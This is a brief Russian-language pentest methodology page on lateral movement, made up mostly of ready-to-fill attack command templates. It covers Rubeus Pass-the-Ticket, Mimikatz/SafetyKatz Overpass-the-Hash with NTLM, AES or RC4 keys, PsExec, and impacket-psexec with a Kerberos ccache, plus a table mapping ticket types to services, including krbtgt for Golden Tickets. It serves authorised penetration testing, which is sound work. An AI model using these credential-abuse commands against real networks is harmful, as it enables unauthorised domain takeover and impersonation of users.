Горизонтальное перемещение
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Определите доступные каналы выхода и доверенные сегменты.
- Настройте туннели или ретрансляцию в соответствии с правилами теста.
- Проверяйте маршрут и стабильность сессии перед движением дальше.
- Синтаксис утилит в методике не меняется.
Методика
Pass The Ticket (PTT)
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
Tickets - Techniques
| Service Type | Required Tickets |
|---|---|
| Windows File Share (PsExec) | CIFS |
| LDAP Operations (DSync) | LDAP |
| WinRM | HOST |
| WMI | HOST |
| Powershell Remoting | HOST |
| Schedule Taks | Host |
| Windows Remote Server Administration Tools | RPCSS |
| Golden Tickets | krbtgt |
Overpass The Hash (OTH)
[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"
# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]